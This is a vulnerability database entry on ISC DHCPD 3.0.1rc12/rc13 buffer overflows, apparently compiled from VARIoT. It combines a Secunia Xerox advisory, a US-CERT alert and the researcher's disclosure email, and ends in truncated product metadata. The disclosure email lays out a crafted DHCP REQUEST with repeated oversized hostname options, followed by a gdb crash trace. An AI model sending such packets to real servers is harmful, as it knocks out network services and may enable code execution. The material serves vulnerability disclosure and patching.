var-200408-0175
Vulnerability from variot
The DHCP daemon (DHCPD) for ISC DHCP 3.0.1rc12 and 3.0.1rc13, when compiled in environments that do not provide the vsnprintf function, uses C include files that define vsnprintf to use the less safe vsprintf function, which can lead to buffer overflow vulnerabilities that enable a denial of service (server crash) and possibly execute arbitrary code. The Internet Systems Consortium's (ISC) Dynamic Host Configuration Protocol (DHCP) 3 application contains a buffer overflow vulnerability. As a result, you may gain administrative privileges on vulnerable systems. On systems which lack the vsnprintf() library call, ISC DHCPD defines vsnprintf as:
define vsnprintf(buf, size, fmt, list) vsprintf (buf, fmt, list)
This definition discards the size argument to the function, potentially allowing any occurrence of vsnprintf() to be exploitable, by overflowing whatever intended buffer is passed to the library call. Other locations in DHCPD utilizing this function may be exploitable. This issue is reported to affect ISC DHCPD versions 3.0.1rc12 and 3.0.1rc13. ISC DHCP calls vsnprintf() to write format log file strings.
Secunia is proud to announce the availability of the Secunia Software Inspector.
The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor.
Try it out online: http://secunia.com/software_inspector/
TITLE: XEROX WorkCentre Products Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA23265
VERIFY ADVISORY: http://secunia.com/advisories/23265/
CRITICAL: Moderately critical
IMPACT: Security Bypass, Manipulation of data, Exposure of system information, Exposure of sensitive information, DoS, System access
WHERE:
From local network
OPERATING SYSTEM: Xerox WorkCentre http://secunia.com/product/4746/ Xerox WorkCentre Pro http://secunia.com/product/4553/
DESCRIPTION: Some vulnerabilities and weaknesses have been reported in various XEROX WorkCentre products, which can be exploited by malicious people to bypass certain security restrictions, expose certain sensitive information, cause a DoS (Denial of Service), and compromise a vulnerable system.
1) Input passed to the TCP/IP hostname, the Scan-to-mailbox folder name field, and to the Microsoft Network configuration parameters in the Web User interface is not properly sanitised.
2) Certain browser settings may allow unauthorized access. Additionally, an unspecified vulnerability in the Web User Interface can be exploited to bypass the authentication.
3) The TFTP/BOOTP auto configuration can be exploited to manipulate certain configuration settings.
4) An unspecified error within the handling of email signatures can be exploited to display improper items.
5) Requests to web services can be made through HTTP instead of HTTPS. Other unspecified HTTP security issues and a httpd.conf misconfiguration are also reported.
6) An error within the Scan-to-mailbox feature can be exploited to anonymously download secure files. Additionally, it is possible to anonymously download audit log files.
7) The system fails to keep accurate time resulting in incorrect time stamps in audit logs.
8) The embedded Samba version contains various vulnerabilities. Additionally, the SMB "Homes" share is visible and it's possible to browse the file system via SMB.
9) The SNMP agent does not return errors for non-writable objects. Additionally, authentication failure traps can't be enabled or generated.
10) An error within ops3-dmn can be exploited to crash the service and cause a DoS by attaching a PS script.
11) It is possible to bypass the security restriction and boot Alchemy by e.g. using an USB thumb drive.
12) The "Validate Repository SSL Certificate" scan feature does not verify the FQDN.
13) Certain problems with the Immediate Image Overwrite and On Demand Image Overwrite, a Postgress port block, and a http TRACE XSS attack in the network controller are reported.
14) Two boundary errors within the embedded DHCP implementation can be exploited to cause a buffer overflow, which may allow execution of arbitrary code.
SOLUTION: Apply updated software (see vendor advisories for detailed instructions).
PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY: Xerox: http://www.xerox.com/downloads/usa/en/c/cert_XRX06_006_v1b.pdf http://www.xerox.com/downloads/usa/en/c/cert_XRX06_004_v11.pdf
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Technical Cyber Security Alert TA04-174A
Multiple Vulnerabilities in ISC DHCP 3
Original release date: June 22, 2004 Last revised: -- Source: US-CERT
Systems Affected
* ISC DHCP versions 3.0.1rc12 and 3.0.1rc13
Overview
Two vulnerabilities in the ISC DHCP allow a remote attacker to cause a denial of the DHCP service on a vulnerable system. It may be possible to exploit these vulnerabilities to execute arbitrary code on the system.
I.
VU#317350 discusses a buffer overflow vulnerability in the temporary storage of log lines. In transactions, ISC DHCPD logs every DHCP packet along with several pieces of descriptive information. The client's DISCOVER and the resulting OFFER, REQUEST, ACK, and NAKs are all logged. In all of these messages, if the client supplied a hostname, then it is also included in the logged line. As part of the DHCP datagram format, a client may specify multiple hostname options, up to 255 bytes per option. These options are concatenated by the server. If the hostname and options contain only ASCII characters, then the string will pass non-ASCII character filters and be temporarily stored in 1024 byte fixed-length buffers on the stack. If a client supplies enough hostname options, it is possible to overflow the fixed-length buffer.
VU#654390 discusses C include files for systems that do not support the bounds checking vsnprintf() function. These files define the bounds checking vsnprintf() to the non-bounds checking vsprintf() function. Since vsprintf() is a function that does not check bounds, the size is discarded, creating the potential for a buffer overflow when client data is supplied. Note that the vsnprintf() statements are defined after the vulnerable code that is discussed in VU#317350. Since the preconditions for this vulnerability are similar to those required to exploit VU#317350, these buffer overflow conditions occur sequentially in the code after the buffer overflow vulnerability discussed in VU#317350, and these issues were discovered and resolved at the same time, there is no known exploit path to exploit these buffer overflow conditions caused by VU#654390. Note that VU#654390 was discovered and exploitable once VU#317350 was resolved.
For both of the vulnerabilities, only ISC DHCP 3.0.1rc12 and ISC DHCP 3.0.1rc13 are believed to be vulnerable. VU#317350 is exploitable for all operating systems and configurations. VU#654390 is only defined for the following operating systems:
* AIX
* AlphaOS
* Cygwin32
* HP-UX
* Irix
* Linux
* NextStep
* SCO
* SunOS 4
* SunOS 5.5
* Ultrix
All versions of ISC DCHP 3, including all snapshots, betas, and release candidates, contain the flawed code.
US-CERT is tracking these issues as VU#317350, which has been assigned CVE CAN-2004-0460, and VU#654390, which has been assigned CVE CAN-2004-0461.
II.
III. Solution
Apply patches or upgrade
These issues have been resolved in ISC DHCP 3.0.1rc14. Your vendor may provide specific patches or updates. For vendor-specific information, please see your vendor's site, or look for your vendor infomation in VU#317350 and VU#654390. As vendors report new information to US-CERT, we will update the vulnerability notes.
Appendix B. References
* http://www.isc.org/sw/dhcp/
* http://www.kb.cert.org/vuls/id/317350
* http://www.kb.cert.org/vuls/id/654390
US-CERT thanks Gregory Duchemin and Solar Designer for discovering, reporting, and resolving this vulnerability. Thanks also to David Hankins of ISC for notifying us of this vulnerability and the technical information provided to create this document.
Feedback can be directed to the author: Jason A. Rafail
The latest version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA04-174A.html>
Copyright 2004 Carnegie Mellon University.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
June 22, 2004: Initial release
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQFA2HFSXlvNRxAkFWARArH4AKDtUECQTE5HXmvsDQkwcWn9r7uAowCdGTHq AqWt3CgdEPJcIFDbJlIWQHo= =HSxN -----END PGP SIGNATURE----- . Hi, for those interested to reproduce the recent DOS attacks against ISC DHCPD 3.0.1 rc12 and rc13 as described in: http://www.kb.cert.org/vuls/id/317350 , i'm forwarding the first email i sent to ISC describing several stack based buffer overflows occuring during the creation of log messages and triggered by sending several DHCP HOSTNAME options within a single request. This mail also includes a trace of such DHCP REQUEST.
Other .bss overflows related to vsnprintf and identified later during our investigations as described in: http://www.kb.cert.org/vuls/id/654390 can be triggered the exact same way. Note that the home made tool i am referencing in this email will be made available very soon and already includes ISC, INFOBLOX and DLINK dhcp vulnerabilities I will drop a note here when it is finally released. cheers, Gregory
Special thanks to Solar Designer and David W.Hankins (ISC)
--- Original email ------
Summary:
i have discovered several stack based overflow in your dhcp-3.0.1rc12 and rc13 (may be others, have not checked) these vulnerabilities can be easily triggered by crafting a dhcp discover or request packet which carries several hostname dhcp options that ,once reassembled by the daemon (as explained in rfc 3396), overflow a stack based variable causing the daemon to crash. I believe than one might execute code remotely on the server with the same user account dhcpd is running with, root in most cases. I have been able at some points during the tests, to control eip' 4 bytes (intel 32bits arch), it was during the ddns forward update operation. Note that all tests have been made on a linux 2.4.20-24.9 using a home made tool to generate custom dhcp traffic
Now an example:
see dhcpd.conf in attachment if you need it.
structure of an offending packet (case of a dhcp request based attack)
DHCP request from 0.0.0.0:68 (ff:ff:ff:ff:ff:ff) to 255.255.255.255:67 (ff:ff:ff:ff:ff:ff)
op : BOOT REQUEST (1) htype : Ethernet (10Mb) (1) hlen : 6 hops : 0 xid : 0x00000000 secs : 1 flags : UNICAST (0x0000) ciaddr : 0.0.0.0 yiaddr : 0.0.0.0 siaddr : 255.255.255.255 giaddr : 0.0.0.0 chaddr : ff:ff:ff:ff:ff:ff sname : file : cookie : 0x63825363 (RFC 1497/2132, BOOTP Vendor informations/DHCP options) DHCP option (053 [0x35]) : MESSAGE_TYPE : REQUEST BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BOOTP option (012 [0x0c]) : HOSTNAME : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA DHCP option (050 [0x32]) : REQUEST_IP : 192.168.0.99
sending this packet to the ptraced daemon (within gdb) gives:
(gdb) run -f -d The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/sbin/dhcpd -f -d Internet Software Consortium DHCP Server V3.0.1rc13 Copyright 1995-2003 Internet Software Consortium. All rights reserved. For info, please visit http://www.isc.org/products/DHCP Wrote 0 deleted host decls to leases file. Wrote 0 new dynamic host decls to leases file. Wrote 0 leases to leases file. Listening on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24 Sending on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24 Sending on Socket/fallback/fallback-net Unable to add forward map from bobAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-1022AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8 860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-284AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1. 92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0X1.1DEF80811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X 1.FDE880811DEF8P+0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-0X1.FDE2008071205P+0A.zob.com.0X1.
Program received signal SIGSEGV, Segmentation fault. 0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50, name=0x8149dac "\001\xff\xff\xff\xff\xff\xff", len=7, file=0x80bbe25 "mdb.c", line=1662) at hash.c:363 363 hashno = (*table -> do_hash) (name, len, table -> hash_count); (gdb)
backtracing stack show:
(gdb) bt
0 0x080add76 in hash_lookup (vp=0xbfffde24, table=0x38322d50,
name=0x8149dac "\001\xff\xff\xff\xff\xff\xff", len=7, file=0x80bbe25 "mdb.c", line=1662) at hash.c:363
1 0x0806fb0a in lease_hash_lookup (ptr=0xbfffde24, table=0x38322d50,
buf=0x8149dac "\001\xff\xff\xff\xff\xff\xff", len=7, file=0x80bbe25 "mdb.c", line=1662) at mdb.c:2055
2 0x0806eb5b in find_lease_by_hw_addr (lp=0xbfffde24, hwaddr=0x8149dac
"\001\xff\xff\xff\xff\xff\xff", hwlen=7, file=0x80bbe25 "mdb.c", line=1662) at mdb.c:1574
3 0x0806ee5f in hw_hash_add (lease=0x8149d30) at mdb.c:1661
4 0x0806d959 in supersede_lease (comp=0x8149d30, lease=0x811def8,
commit=1, propogate=1, pimmediate=1) at mdb.c:969
5 0x08050cb9 in ack_lease (packet=0x811d6e0, lease=0x8149d30, offer=5,
when=0, msg=0xbfffdfd0 "DHCPREQUEST for 192.168.0.99 from ff:ff:ff:ff:ff:ff via eth0", ms_nulltp=0) at dhcp.c:2227
6 0x0804d041 in dhcprequest (packet=0x811d6e0, ms_nulltp=0,
ip_lease=0x0) at dhcp.c:662
7 0x0804c37d in dhcp (packet=0x811d6e0) at dhcp.c:224
8 0x08088d9a in do_packet (interface=0x811d568, packet=0xbfffe580,
len=1430, from_port=17408, from=
{len = 4, iabuf = '\0'
9 0x08096718 in got_one (h=0x811d568) at discover.c:785
10 0x080a937e in omapi_one_dispatch (wo=0x0, t=0x0) at dispatch.c:418
11 0x0807cce3 in dispatch () at dispatch.c:103
12 0x0804add1 in main (argc=3, argv=0xbffff904, envp=0xbffff914) at
dhcpd.c:614
13 0x42015574 in __libc_start_main () from /lib/tls/libc.so.6
(gdb)
Note that the daemon may actually crash at a different location depending of the first corrupted structure it meets and therefore, of the size of the malicious option sent, along with the context (type of packet, leases in use etc...)
Problems in the source: I have spent quite some time to find out where the overflow actually takes its roots, here are my findings:
file server/dhcp.c: function dhcprequest :
char msgbuf [1024]; /* XXX */
char *s;
....
if (lease && lease -> client_hostname && db_printable (lease -> client_hostname)) s = lease -> client_hostname; else s = (char *)0;
......
sprintf (msgbuf, "DHCPREQUEST for %s%s from %s %s%s%svia %s",
piaddr (cip), smbuf,
(packet -> raw -> htype
? print_hw_addr (packet -> raw -> htype,
packet -> raw -> hlen,
packet -> raw -> chaddr)
: (lease
? print_hex_1 (lease -> uid_len, lease -> uid,
lease -> uid_len)
: "
To summarize, s is referencing the reassembled hostname option passed to the daemon, afterwhat it is used as is in sprintf and stored in msgbuf (fixed size) without any length checking. local msgbuf can obviously be overrun, corrupting various structures in stack and eventually causing the server to crash Note that the call to db_printable( ), filtering hostname, may render the task harder to root a server but likely not impossible. Also being able to corrupt structures like lease or oc may have interesting side effects from an attacker perspective.
void dhcprequest (packet, ms_nulltp, ip_lease) struct packet packet; int ms_nulltp; struct lease ip_lease; { struct lease lease; struct iaddr cip; struct iaddr sip; struct subnet subnet; int ours = 0; struct option_cache oc; struct data_string data; int status; char msgbuf [1024]; / XXX / char s; char smbuf [19];
....
the very same problem is present in dhcpdiscover( ), dhcpdecline( ),
dhcprequest( ) , dhcprelease( ), ...
please look at the diff in unified format, attached to this email, for a
detailed list
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200408-0175",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "fedora",
"version": null
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "infoblox",
"version": null
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "mandrakesoft",
"version": null
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "suse",
"version": null
},
{
"model": "fedora core",
"scope": "eq",
"trust": 1.6,
"vendor": "redhat",
"version": "core_2.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "suse",
"version": "8.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "suse",
"version": "8.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "7"
},
{
"model": "linux firewall cd",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "*"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "9.1"
},
{
"model": "dns one appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "infoblox",
"version": "2.4.0.8a"
},
{
"model": "linux database server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "*"
},
{
"model": "linux connectivity server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "*"
},
{
"model": "dhcpd",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "3.0.1"
},
{
"model": "dns one appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "infoblox",
"version": "2.4.0.8"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "8"
},
{
"model": "linux office server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "*"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "9.1"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "9.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "9.0"
},
{
"model": "linux admin-cd for firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "*"
},
{
"model": "email server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "iii"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "8.2"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "9.0"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.0"
},
{
"model": "dns one appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "infoblox",
"version": "2.3.1_r5"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "isc",
"version": null
},
{
"model": "dhcp",
"scope": "eq",
"trust": 0.8,
"vendor": "isc",
"version": "3.0.1rc12"
},
{
"model": "dhcp",
"scope": "eq",
"trust": 0.8,
"vendor": "isc",
"version": "3.0.1rc13"
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "8"
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "7"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "8.0"
},
{
"model": "suse email server iii",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.1"
},
{
"model": "linux personal x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "8.2"
},
{
"model": "linux office server",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"model": "linux firewall on cd",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"model": "linux database server",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "0"
},
{
"model": "linux connectivity server",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"model": "linux admin-cd for firewall",
"scope": null,
"trust": 0.3,
"vendor": "s u s e",
"version": null
},
{
"model": "fedora core2",
"scope": null,
"trust": 0.3,
"vendor": "redhat",
"version": null
},
{
"model": "linux mandrake amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.0"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.0"
},
{
"model": "linux mandrake amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "9.2"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "9.2"
},
{
"model": "linux mandrake ppc",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "9.1"
},
{
"model": "linux mandrake",
